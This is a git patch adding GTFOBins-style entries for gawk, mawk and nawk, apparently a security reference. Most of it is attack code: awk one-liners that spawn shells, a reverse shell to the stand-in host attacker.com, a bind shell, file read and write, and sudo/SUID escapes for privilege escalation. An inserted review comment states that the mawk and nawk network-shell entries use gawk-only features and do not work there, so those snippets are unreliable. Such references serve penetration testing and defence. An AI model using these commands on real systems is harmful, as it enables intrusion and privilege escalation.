From 977232c45c7679e27d5564ca3a88bf4916e75463 Mon Sep 17 00:00:00 2001
From: AlessandroZ
Date: Fri, 30 Aug 2019 15:10:25 +0200
Subject: [PATCH] adding gawk, nawk, mawk
---
 _gtfobins/gawk.md | 34 ++++++++++++++++++++++++++++++++++
 _gtfobins/mawk.md | 34 ++++++++++++++++++++++++++++++++++
 _gtfobins/nawk.md | 34 ++++++++++++++++++++++++++++++++++
 3 files changed, 102 insertions(+)
 create mode 100644 _gtfobins/gawk.md
 create mode 100644 _gtfobins/mawk.md
 create mode 100644 _gtfobins/nawk.md
diff --git a/_gtfobins/gawk.md b/_gtfobins/gawk.md
new file mode 100644
index 0000000..bf63ca8
--- /dev/null
+++ b/_gtfobins/gawk.md
@@ -0,0 +1,34 @@
+---
+functions:
+ shell:
+ - code: gawk 'BEGIN {system("/bin/sh")}'
+ non-interactive-reverse-shell:
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ gawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
+ s = "/inet/tcp/0/" RHOST "/" RPORT;
+ while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+ while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
+ non-interactive-bind-shell:
+ - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
+ code: |
+ LPORT=12345
+ gawk -v LPORT=$LPORT 'BEGIN {
+ s = "/inet/tcp/" LPORT "/0/0";
+ while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+ while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
+ file-write:
+ - code: |
+ LFILE=file_to_write
+ gawk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ gawk '//' "$LFILE"
+ sudo:
+ - code: sudo gawk 'BEGIN {system("/bin/sh")}'
+ limited-suid:
+ - code: ./gawk 'BEGIN {system("/bin/sh")}'
+---
diff --git a/_gtfobins/mawk.md b/_gtfobins/mawk.md
new file mode 100644
index 0000000..6281baf
--- /dev/null
+++ b/_gtfobins/mawk.md
@@ -0,0 +1,34 @@
+---
+functions:
+ shell:
+ - code: mawk 'BEGIN {system("/bin/sh")}'
+ non-interactive-reverse-shell:
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ mawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
+ s = "/inet/tcp/0/" RHOST "/" RPORT;
+ while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+ while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
+ non-interactive-bind-shell:
+ - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
+ code: |
+ LPORT=12345
+ mawk -v LPORT=$LPORT 'BEGIN {
+ s = "/inet/tcp/" LPORT "/0/0";
+ while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+ while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
+ file-write:
+ - code: |
+ LFILE=file_to_write
+ mawk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ mawk '//' "$LFILE"
+ sudo:
+ - code: sudo mawk 'BEGIN {system("/bin/sh")}'
+ limited-suid:
+ - code: ./mawk 'BEGIN {system("/bin/sh")}'
+---
diff --git a/_gtfobins/nawk.md b/_gtfobins/nawk.md
new file mode 100644
index 0000000..9dc77fa
--- /dev/null
+++ b/_gtfobins/nawk.md
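Review bot: The non-interactive-reverse-shell and non-interactive-bind-shell entries in mawk.md depend on the `/inet/tcp/...` special files and the `|&` coprocess operator, which are gawk extensions that mawk does not implement, so both snippets will be rejected as a syntax error by mawk; the same two entries in nawk.md (next hunk) have the same problem. The entries appear to have been copied from gawk.md with only the binary name changed. Either drop those two functions from the mawk and nawk files, or keep for them only the `system()`, file-read and file-write entries, which use plain POSIX awk constructs and are the only ones that actually apply to those implementations.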
@@ -0,0 +1,34 @@
+---
+functions:
+ shell:
+ - code: nawk 'BEGIN {system("/bin/sh")}'
+ non-interactive-reverse-shell:
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ nawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
+ s = "/inet/tcp/0/" RHOST "/" RPORT;
+ while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+ while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
+ non-interactive-bind-shell:
+ - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
+ code: |
+ LPORT=12345
+ nawk -v LPORT=$LPORT 'BEGIN {
+ s = "/inet/tcp/" LPORT "/0/0";
+ while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+ while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
+ file-write:
+ - code: |
+ LFILE=file_to_write
+ nawk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ nawk '//' "$LFILE"
+ sudo:
+ - code: sudo nawk 'BEGIN {system("/bin/sh")}'
+ limited-suid:
+ - code: ./nawk 'BEGIN {system("/bin/sh")}'
+---